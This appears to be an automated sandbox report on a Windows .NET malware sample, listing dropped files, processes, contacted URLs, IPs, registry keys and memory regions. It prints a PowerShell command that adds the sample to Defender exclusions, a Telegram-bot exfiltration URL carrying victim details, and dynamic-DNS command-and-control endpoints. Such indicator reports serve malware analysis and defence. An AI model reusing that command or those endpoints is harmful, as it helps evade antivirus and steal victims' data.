Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
2Lzx7LMDWV.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2Lzx7LMDWV.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aih0hza.nam.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsa3qsnl.1qu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to43g1ae.30c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xd32leeb.h0h.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\2Lzx7LMDWV.exe
|
"C:\Users\user\Desktop\2Lzx7LMDWV.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"
|
|
|
|
C:\Users\user\Desktop\2Lzx7LMDWV.exe
|
"C:\Users\user\Desktop\2Lzx7LMDWV.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.fontbureau.com/designersG
|
unknown
|
||
|
http://www.fontbureau.com/designers/?
|
unknown
|
||
|
http://www.founder.com.cn/cn/bThe
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://www.fontbureau.com/designers?
|
unknown
|
||
|
https://www.office.com/lB
|
unknown
|
||
|
http://www.tiro.com
|
unknown
|
||
|
http://www.fontbureau.com/designers
|
unknown
|
||
|
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
|
http://www.goodfont.co.kr
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
|
http://varders.kozow.com:8081
|
unknown
|
||
|
http://www.sajatypeworks.com
|
unknown
|
||
|
http://www.typography.netD
|
unknown
|
||
|
http://www.founder.com.cn/cn/cThe
|
unknown
|
||
|
http://www.galapagosdesign.com/staff/dennis.htm
|
unknown
|
||
|
http://checkip.dyndns.org/
|
193.122.6.168
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
|
unknown
|
||
|
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=enlB
|
unknown
|
||
|
http://www.galapagosdesign.com/DPlease
|
unknown
|
||
|
http://www.fonts.com
|
unknown
|
||
|
http://www.sandoll.co.kr
|
unknown
|
||
|
http://www.urwpp.deDPlease
|
unknown
|
||
|
http://www.zhongyicts.com.cn
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.sakkal.com
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.fontbureau.com
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/173.254.250.82$
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2001/11/2024%20/%2015:20:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
|
http://www.carterandcone.coml
|
unknown
|
||
|
http://aborters.duckdns.org:8081
|
unknown
|
||
|
http://www.fontbureau.com/designers/cabarga.htmlN
|
unknown
|
||
|
http://www.founder.com.cn/cn
|
unknown
|
||
|
http://www.fontbureau.com/designers/frere-user.html
|
unknown
|
||
|
http://anotherarmy.dns.army:8081
|
unknown
|
||
|
http://www.jiyu-kobo.co.jp/
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/173.254.250.82
|
188.114.96.3
|
||
|
http://www.fontbureau.com/designers8
|
unknown
|
||
|
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
|
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
|
unknown
|
There are 40 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
188.114.96.3
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
15.164.165.52.in-addr.arpa
|
unknown
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
200.163.202.172.in-addr.arpa
|
unknown
|
|
|
|
checkip.dyndns.com
|
193.122.6.168
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
188.114.96.3
|
reallyfreegeoip.org
|
European Union
|
|
|
|
188.114.97.3
|
unknown
|
European Union
|
||
|
193.122.6.168
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\2Lzx7LMDWV_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
3E3B000
|
trusted library allocation
|
page read and write
|
|
|
|
2EA1000
|
trusted library allocation
|
page read and write
|
|
|
|
5060000
|
trusted library allocation
|
page read and write
|
||
|
4DA0000
|
heap
|
page execute and read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
31C2000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
105C000
|
heap
|
page read and write
|
||
|
333F000
|
trusted library allocation
|
page read and write
|
||
|
CA0000
|
trusted library allocation
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page read and write
|
||
|
336E000
|
trusted library allocation
|
page read and write
|
||
|
53CD000
|
stack
|
page read and write
|
||
|
412E000
|
trusted library allocation
|
page read and write
|
||
|
3311000
|
trusted library allocation
|
page read and write
|
||
|
7423000
|
heap
|
page read and write
|
||
|
4D6B000
|
stack
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4094000
|
trusted library allocation
|
page read and write
|
||
|
6D90000
|
trusted library allocation
|
page read and write
|
||
|
683E000
|
stack
|
page read and write
|
||
|
4164000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
305A000
|
trusted library allocation
|
page read and write
|
||
|
530D000
|
trusted library allocation
|
page read and write
|
||
|
C4E000
|
stack
|
page read and write
|
||
|
5700000
|
heap
|
page read and write
|
||
|
1320000
|
trusted library allocation
|
page read and write
|
||
|
52FA000
|
trusted library allocation
|
page read and write
|
||
|
3FF7000
|
trusted library allocation
|
page read and write
|
||
|
52EE000
|
trusted library allocation
|
page read and write
|
||
|
4037000
|
trusted library allocation
|
page read and write
|
||
|
73F0000
|
heap
|
page read and write
|
||
|
303B000
|
trusted library allocation
|
page read and write
|
||
|
6C20000
|
trusted library allocation
|
page read and write
|
||
|
7426000
|
heap
|
page read and write
|
||
|
2F4A000
|
trusted library allocation
|
page read and write
|
||
|
10BE000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library section
|
page readonly
|
||
|
32E3000
|
trusted library allocation
|
page read and write
|
||
|
41E2000
|
trusted library allocation
|
page read and write
|
||
|
9A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
6B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
58DE000
|
stack
|
page read and write
|
||
|
4157000
|
trusted library allocation
|
page read and write
|
||
|
1350000
|
heap
|
page read and write
|
||
|
3039000
|
trusted library allocation
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page read and write
|
||
|
2F42000
|
trusted library allocation
|
page read and write
|
||
|
E82C000
|
stack
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
5330000
|
trusted library allocation
|
page read and write
|
||
|
FD8000
|
heap
|
page read and write
|
||
|
3FE000
|
stack
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F5A000
|
trusted library allocation
|
page read and write
|
||
|
AAF000
|
heap
|
page read and write
|
||
|
3FD8000
|
trusted library allocation
|
page read and write
|
||
|
67FD000
|
stack
|
page read and write
|
||
|
50FE000
|
stack
|
page read and write
|
||
|
408C000
|
trusted library allocation
|
page read and write
|
||
|
3089000
|
trusted library allocation
|
page read and write
|
||
|
66C0000
|
heap
|
page read and write
|
||
|
6C80000
|
heap
|
page read and write
|
||
|
134D000
|
trusted library allocation
|
page execute and read and write
|
||
|
984000
|
trusted library allocation
|
page read and write
|
||
|
7454000
|
heap
|
page read and write
|
||
|
6C17000
|
trusted library allocation
|
page read and write
|
||
|
6B50000
|
trusted library allocation
|
page execute and read and write
|
||
|
412C000
|
trusted library allocation
|
page read and write
|
||
|
3FE8000
|
trusted library allocation
|
page read and write
|
||
|
58E0000
|
trusted library allocation
|
page read and write
|
||
|
4D90000
|
heap
|
page read and write
|
||
|
E5EE000
|
stack
|
page read and write
|
||
|
2EF2000
|
trusted library allocation
|
page read and write
|
||
|
41F7000
|
trusted library allocation
|
page read and write
|
||
|
411E000
|
trusted library allocation
|
page read and write
|
||
|
41FA000
|
trusted library allocation
|
page read and write
|
||
|
308D000
|
trusted library allocation
|
page read and write
|
||
|
F9E000
|
stack
|
page read and write
|
||
|
4205000
|
trusted library allocation
|
page read and write
|
||
|
993000
|
trusted library allocation
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
5324000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
2C12000
|
trusted library allocation
|
page read and write
|
||
|
2F0A000
|
trusted library allocation
|
page read and write
|
||
|
4B7B000
|
trusted library allocation
|
page read and write
|
||
|
4210000
|
trusted library allocation
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AD0000
|
trusted library allocation
|
page read and write
|
||
|
41D5000
|
trusted library allocation
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
73F5000
|
heap
|
page read and write
|
||
|
5710000
|
heap
|
page read and write
|
||
|
2FAD000
|
trusted library allocation
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
983000
|
trusted library allocation
|
page execute and read and write
|
||
|
41CB000
|
trusted library allocation
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
3F73000
|
trusted library allocation
|
page read and write
|
||
|
1334000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
2841000
|
trusted library allocation
|
page read and write
|
||
|
5754000
|
heap
|
page read and write
|
||
|
3093000
|
trusted library allocation
|
page read and write
|
||
|
A00000
|
trusted library allocation
|
page read and write
|
||
|
4105000
|
trusted library allocation
|
page read and write
|
||
|
2F5E000
|
trusted library allocation
|
page read and write
|
||
|
2F1C000
|
trusted library allocation
|
page read and write
|
||
|
5900000
|
trusted library allocation
|
page read and write
|
||
|
4B70000
|
trusted library allocation
|
page read and write
|
||
|
6C30000
|
trusted library allocation
|
page read and write
|
||
|
9CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
25E1000
|
trusted library allocation
|
page read and write
|
||
|
1333000
|
trusted library allocation
|
page execute and read and write
|
||
|
4225000
|
trusted library allocation
|
page read and write
|
||
|
52F2000
|
trusted library allocation
|
page read and write
|
||
|
5306000
|
trusted library allocation
|
page read and write
|
||
|
3098000
|
trusted library allocation
|
page read and write
|
||
|
6BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
133D000
|
trusted library allocation
|
page execute and read and write
|
||
|
99D000
|
trusted library allocation
|
page execute and read and write
|
||
|
990000
|
trusted library allocation
|
page read and write
|
||
|
52E6000
|
trusted library allocation
|
page read and write
|
||
|
E4AE000
|
stack
|
page read and write
|
||
|
1B0000
|
unkown
|
page readonly
|
||
|
2F46000
|
trusted library allocation
|
page read and write
|
||
|
424A000
|
trusted library allocation
|
page read and write
|
||
|
1330000
|
trusted library allocation
|
page read and write
|
||
|
2F8A000
|
trusted library allocation
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
2C15000
|
trusted library allocation
|
page execute and read and write
|
||
|
35E1000
|
trusted library allocation
|
page read and write
|
||
|
3EC3000
|
trusted library allocation
|
page read and write
|
||
|
2F4E000
|
trusted library allocation
|
page read and write
|
||
|
CD0000
|
trusted library allocation
|
page read and write
|
||
|
6B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
C0F000
|
stack
|
page read and write
|
||
|
3120000
|
trusted library allocation
|
page read and write
|
||
|
C8C000
|
stack
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
4132000
|
trusted library allocation
|
page read and write
|
||
|
2C10000
|
trusted library allocation
|
page read and write
|
||
|
CF6000
|
trusted library allocation
|
page read and write
|
||
|
4B50000
|
trusted library allocation
|
page read and write
|
||
|
422B000
|
trusted library allocation
|
page read and write
|
||
|
339C000
|
trusted library allocation
|
page read and write
|
||
|
E72C000
|
stack
|
page read and write
|
||
|
5340000
|
trusted library allocation
|
page read and write
|
||
|
45E8000
|
trusted library allocation
|
page read and write
|
||
|
E5AF000
|
stack
|
page read and write
|
||
|
3F7A000
|
trusted library allocation
|
page read and write
|
||
|
25BF000
|
stack
|
page read and write
|
||
|
2CBC000
|
stack
|
page read and write
|
||
|
308B000
|
trusted library allocation
|
page read and write
|
||
|
34A000
|
stack
|
page read and write
|
||
|
4197000
|
trusted library allocation
|
page read and write
|
||
|
A18000
|
heap
|
page read and write
|
||
|
4B90000
|
heap
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
305C000
|
trusted library allocation
|
page read and write
|
||
|
412A000
|
trusted library allocation
|
page read and write
|
||
|
2DF8000
|
trusted library allocation
|
page read and write
|
||
|
3F86000
|
trusted library allocation
|
page read and write
|
||
|
4088000
|
trusted library allocation
|
page read and write
|
||
|
25D0000
|
heap
|
page execute and read and write
|
||
|
6822000
|
trusted library allocation
|
page read and write
|
||
|
3F0D000
|
trusted library allocation
|
page read and write
|
||
|
4058000
|
trusted library allocation
|
page read and write
|
||
|
2F14000
|
trusted library allocation
|
page read and write
|
||
|
41C8000
|
trusted library allocation
|
page read and write
|
||
|
3EA1000
|
trusted library allocation
|
page read and write
|
||
|
52EB000
|
trusted library allocation
|
page read and write
|
||
|
6C0E000
|
heap
|
page read and write
|
||
|
40AC000
|
trusted library allocation
|
page read and write
|
||
|
421E000
|
trusted library allocation
|
page read and write
|
||
|
3F8E000
|
trusted library allocation
|
page read and write
|
||
|
E6EF000
|
stack
|
page read and write
|
||
|
4B32000
|
trusted library allocation
|
page read and write
|
||
|
3FB2000
|
trusted library allocation
|
page read and write
|
||
|
4136000
|
trusted library allocation
|
page read and write
|
||
|
557D000
|
trusted library allocation
|
page read and write
|
||
|
697E000
|
stack
|
page read and write
|
||
|
6F7000
|
stack
|
page read and write
|
||
|
5353000
|
heap
|
page read and write
|
||
|
3085000
|
trusted library allocation
|
page read and write
|
||
|
65BE000
|
stack
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
3F63000
|
trusted library allocation
|
page read and write
|
||
|
5566000
|
trusted library allocation
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
4126000
|
trusted library allocation
|
page read and write
|
||
|
6C00000
|
heap
|
page read and write
|
||
|
3EC9000
|
trusted library allocation
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
4117000
|
trusted library allocation
|
page read and write
|
||
|
3F88000
|
trusted library allocation
|
page read and write
|
||
|
41FD000
|
trusted library allocation
|
page read and write
|
||
|
F45000
|
heap
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
9F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5350000
|
heap
|
page read and write
|
||
|
73DF000
|
stack
|
page read and write
|
||
|
4B10000
|
heap
|
page read and write
|
||
|
325A000
|
trusted library allocation
|
page read and write
|
||
|
4229000
|
trusted library allocation
|
page read and write
|
||
|
744E000
|
heap
|
page read and write
|
||
|
6B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
C90000
|
trusted library allocation
|
page read and write
|
||
|
CFD000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
3FD0000
|
trusted library allocation
|
page read and write
|
||
|
4138000
|
trusted library allocation
|
page read and write
|
||
|
855000
|
heap
|
page read and write
|
||
|
A44000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page execute and read and write
|
||
|
3EAB000
|
trusted library allocation
|
page read and write
|
||
|
2C02000
|
trusted library allocation
|
page read and write
|
||
|
58F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
50B0000
|
heap
|
page read and write
|
||
|
3F82000
|
trusted library allocation
|
page read and write
|
||
|
882E000
|
stack
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
556A000
|
trusted library allocation
|
page read and write
|
||
|
5301000
|
trusted library allocation
|
page read and write
|
||
|
BEA000
|
stack
|
page read and write
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
41ED000
|
trusted library allocation
|
page read and write
|
||
|
CDB000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
30F0000
|
trusted library allocation
|
page read and write
|
||
|
4242000
|
trusted library allocation
|
page read and write
|
||
|
3067000
|
trusted library allocation
|
page read and write
|
||
|
4B3B000
|
trusted library allocation
|
page read and write
|
||
|
73FD000
|
heap
|
page read and write
|
||
|
50B5000
|
heap
|
page read and write
|
||
|
2C17000
|
trusted library allocation
|
page execute and read and write
|
||
|
CF1000
|
trusted library allocation
|
page read and write
|
||
|
E46E000
|
stack
|
page read and write
|
||
|
892F000
|
stack
|
page read and write
|
||
|
25C0000
|
trusted library allocation
|
page read and write
|
||
|
405A000
|
trusted library allocation
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
6C10000
|
trusted library allocation
|
page read and write
|
||
|
5564000
|
trusted library allocation
|
page read and write
|
||
|
A37000
|
heap
|
page read and write
|
||
|
A1E000
|
heap
|
page read and write
|
||
|
1340000
|
trusted library allocation
|
page read and write
|
||
|
3FD2000
|
trusted library allocation
|
page read and write
|
||
|
3F92000
|
trusted library allocation
|
page read and write
|
||
|
69BE000
|
stack
|
page read and write
|
||
|
418F000
|
trusted library allocation
|
page read and write
|
||
|
80E000
|
stack
|
page read and write
|
||
|
CEE000
|
trusted library allocation
|
page read and write
|
||
|
1B2000
|
unkown
|
page readonly
|
||
|
3F8A000
|
trusted library allocation
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
E36E000
|
stack
|
page read and write
|
||
|
129E000
|
stack
|
page read and write
|
||
|
6B3E000
|
stack
|
page read and write
|
||
|
6C00000
|
trusted library allocation
|
page read and write
|
||
|
2C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
3626000
|
trusted library allocation
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page read and write
|
||
|
413A000
|
trusted library allocation
|
page read and write
|
||
|
322C000
|
trusted library allocation
|
page read and write
|
||
|
32B5000
|
trusted library allocation
|
page read and write
|
||
|
CB5000
|
trusted library allocation
|
page read and write
|
||
|
4E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F96000
|
trusted library allocation
|
page read and write
|
||
|
2F62000
|
trusted library allocation
|
page read and write
|
||
|
3FD6000
|
trusted library allocation
|
page read and write
|
||
|
3054000
|
trusted library allocation
|
page read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
AD7000
|
heap
|
page read and write
|
||
|
41E8000
|
trusted library allocation
|
page read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
3FC0000
|
trusted library allocation
|
page read and write
|
||
|
5140000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
4107000
|
trusted library allocation
|
page read and write
|
||
|
5130000
|
trusted library allocation
|
page read and write
|
||
|
404F000
|
trusted library allocation
|
page read and write
|
||
|
2EFE000
|
trusted library allocation
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
F40000
|
heap
|
page read and write
|
||
|
3F5D000
|
trusted library allocation
|
page read and write
|
||
|
3031000
|
trusted library allocation
|
page read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
1006000
|
heap
|
page read and write
|
||
|
CB0000
|
trusted library allocation
|
page read and write
|
||
|
55A0000
|
heap
|
page read and write
|
||
|
423B000
|
trusted library allocation
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
2F56000
|
trusted library allocation
|
page read and write
|
||
|
5719000
|
heap
|
page read and write
|
||
|
6B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
4101000
|
trusted library allocation
|
page read and write
|
||
|
477C000
|
stack
|
page read and write
|
||
|
278000
|
unkown
|
page readonly
|
||
|
9C2000
|
trusted library allocation
|
page read and write
|
||
|
6F3D000
|
stack
|
page read and write
|
||
|
A51000
|
heap
|
page read and write
|
||
|
9A2000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
4176000
|
trusted library allocation
|
page read and write
|
||
|
3058000
|
trusted library allocation
|
page read and write
|
||
|
3FEF000
|
trusted library allocation
|
page read and write
|
||
|
5312000
|
trusted library allocation
|
page read and write
|
||
|
31FF000
|
trusted library allocation
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
98D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C50000
|
heap
|
page read and write
|
||
|
573E000
|
heap
|
page read and write
|
||
|
7433000
|
heap
|
page read and write
|
||
|
53F0000
|
trusted library allocation
|
page read and write
|
||
|
66BE000
|
stack
|
page read and write
|
||
|
35E9000
|
trusted library allocation
|
page read and write
|
||
|
6D97000
|
trusted library allocation
|
page read and write
|
||
|
AB2000
|
heap
|
page read and write
|
||
|
269B000
|
trusted library allocation
|
page read and write
|
||
|
5590000
|
heap
|
page execute and read and write
|
||
|
7FBB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7439000
|
heap
|
page read and write
|
||
|
3192000
|
trusted library allocation
|
page read and write
|
||
|
4199000
|
trusted library allocation
|
page read and write
|
||
|
3F94000
|
trusted library allocation
|
page read and write
|
||
|
4B93000
|
heap
|
page read and write
|
||
|
2C1B000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FED000
|
stack
|
page read and write
|
||
|
3062000
|
trusted library allocation
|
page read and write
|
||
|
EF7000
|
stack
|
page read and write
|
||
|
73F9000
|
heap
|
page read and write
|
||
|
6800000
|
trusted library allocation
|
page read and write
|
||
|
41DC000
|
trusted library allocation
|
page read and write
|
||
|
4D80000
|
heap
|
page read and write
|
||
|
9E0000
|
trusted library allocation
|
page read and write
|
||
|
3F61000
|
trusted library allocation
|
page read and write
|
||
|
2C0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
E32E000
|
stack
|
page read and write
|
||
|
687E000
|
stack
|
page read and write
|
||
|
52FE000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
trusted library allocation
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
30BF000
|
trusted library allocation
|
page read and write
|
||
|
108C000
|
heap
|
page read and write
|
||
|
9AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
980000
|
trusted library allocation
|
page read and write
|
||
|
2F52000
|
trusted library allocation
|
page read and write
|
||
|
6D00000
|
trusted library section
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
3287000
|
trusted library allocation
|
page read and write
|
||
|
4174000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
6BE0000
|
trusted library allocation
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
2F18000
|
trusted library allocation
|
page read and write
|
||
|
9C7000
|
trusted library allocation
|
page execute and read and write
|
There are 354 hidden memdumps, click here to show them.